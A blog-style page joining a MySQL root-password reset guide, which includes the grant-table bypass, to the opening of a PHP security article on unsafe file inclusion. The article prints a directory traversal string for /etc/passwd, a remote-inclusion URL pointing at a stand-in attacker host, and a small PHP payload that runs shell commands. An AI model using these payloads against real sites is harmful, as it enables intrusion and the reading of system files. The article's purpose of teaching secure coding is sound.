A System Admin's Notebook

‘Like locking your keys in the car, to forget your password after
you’ve spent an hour installing and tweaking a new MySQL server can be
an embarassment to say the least.’
[ad#squere-ads]
Fortunately, if you have root access to that computer, all in NOT lost.

Here are the steps when you found yourself in this situation.

1. Kill the server process.
% kill pid
(where pid is the process id. Do not use kill -9 unless absolutely
necessary, as this may damage your table files)

2. Run safe-mysqld with the –skip-grant-tables command line option.
(This instructs the MySQL server to allow unrestricted access to
anyone) NOTE: restrict all remote access before issuing this command
% safe-mysqld --skip-grant-table

3. Change root password
mysql > use mysql;
mysql > update user set password = password('newpassword') where user
= 'root';
[ad#squere-ads]
4. Disconnect and instruct the mysql server to reload the grants
tables to begin requiring passwords.
% mysqladmin flush-privileges

“That does it — and nobody ever has to know what you did. As for
locking your keys in your car, you’re on your own there.”

Must have for php-mysql beginners developers.

This article discusses the common threats and challenges of programming secure PHP applications and practical methods for doing so.

Introduction

The goal of this paper is not only to show common threats and challenges of programming secure PHP applications but also to show you practical methods for doing so. The wonderful thing about PHP is that people with little or even no programming experience are able to achieve simple goals very quickly. The problem, on the other hand, is that many programmers are not really conscious about what is going behind the curtains. Security and convenience do not often go hand in hand — but they can.

Dangers

Files
PHP has some very flexible file handling functions. The include(), require() and fopen() functions accept local path names as well as remote files using URLs. A lot of vulnerabilities I have seen are due to incorrect handling of dynamic file or path names.
[ad#squere-ads]
Example
On a site I will not mention in this article (because the problem still has not been solved) has one script which includes various HTML files and displays them in the proper layout. Have a look at the following URL:

http://example.com/page.php?i=aboutus.html

The variable $i obviously contains the file name to be included. When you see a URL like this, a lot of questions should come to your mind:

* Has the programmer considered directory traversals like i=../../../etc/passwd?
* Does he check for the .html extension?
* Does he use fopen() to include the files?
* Has he thought about not allowing remote files?

In this case, every answer was negative. Time to play! Of course, it is now possible to read all the files the httpd user has read access for. But what is even more exciting is the fact that the include() function is used to include the HTML file. Consider this:

http://example.com/page.php?i=http://evilhacker.org/exec.html

Where exec.html contains a couple of lines of code:

<?php
passthru ('id');
passthru ('ls -al /etc');
passthru ('ping -c 1 evilhaxor.org');
passthru ('echo You have been hax0red | mail root');
?>

I am sure you get the idea. A lot of bad things can be done from here.
Read More